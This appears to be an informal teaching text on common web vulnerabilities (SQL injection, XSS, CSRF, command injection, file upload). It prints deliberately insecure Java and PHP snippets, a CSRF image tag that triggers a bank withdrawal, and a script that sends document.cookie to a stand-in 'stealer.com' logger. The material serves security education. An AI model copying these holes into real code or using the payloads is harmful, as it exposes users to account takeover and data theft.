Web applications are much easier to exploit than attacking the server directly...
Plus, we all know there are a lot of sucky devs out there we can rely upon.
SQL Injection is a technique to insert malicious SQL into a poorly validated entry field.
Sony had this vulnerability.
//Make connection to DB
Connection connection = DriverManager.getConnection(DataURL, LOGIN, PASSWORD);
String Username = request.getParameter("USER"); // From HTTP request
String Password = request.getParameter("PASSWORD"); // From HTTP request
int iUserID = -1;
String sLoggedUser = "";
String sel = "SELECT User_id, Username FROM USERS WHERE Username = '" +Username + \
"' AND Password = '" + Password + "'";
Statement selectStatement = connection.createStatement ();
ResultSet resultSet = selectStatement.executeQuery(sel);
if (resultSet.next()) {
iUserID = resultSet.getInt(1);
sLoggedUser = resultSet.getString(2);
}
Cross Site Scripting also known as XSS is a popular type of Client Site Attack. It allows an attacker to inject desired client-side scripts into Web-Pages viewed by others.
CIA had this vulnerability.
<html>
<body>
<p>Data Entered:</p>
<?php
if(isset($_GET['data']))
{
$data = $_GET['data'];
}
else
{
$data = "No Data Entered !";
}
echo "<i>$data</i>";
?>
</body>Fairly new. It is a type of exploit or website that sends unauthorized commands from a user to a websites that the user trusts.
<html>
<body>
<h1>Welcome to this page.</h1>
<img src="http://bank.example.com/withdraw?account=Alice&amount=1000000&for=Mallory">
</body>
</html>
How would you CSRF a post request?
Google was vulnerable to CSRF!
Probably super lazy developers with very less knowledge about security introduced this bug.
If you try to use a system call somewhere in your webapp's code without properly sanitizing the input, you'll end up screwing yourself over. Isn't that f***ing obvious?
<html>
<body>
<p>File Contents:</p>
<?php
echo "<pre>";
system("cat " . $_GET['filename']);
echo "<pre>";
?>
</body>
Allowing uploading of files without checking their type or extension.
Finding such vulnerability in your webapp is "GGWP" for the hacker.
The hacker after finding this will upload a PHP shell and rip your server apart.
Anonymous, the hacking group's website, had this vulnerability.
Its not a separate vulnerability but the use of persistent XSS to get something useful.
<script language="Java script">
document.location="http://www.stealer.com/cookielogger.php?cookie=" + document.cookie;
</script>Hint:
Makes sense?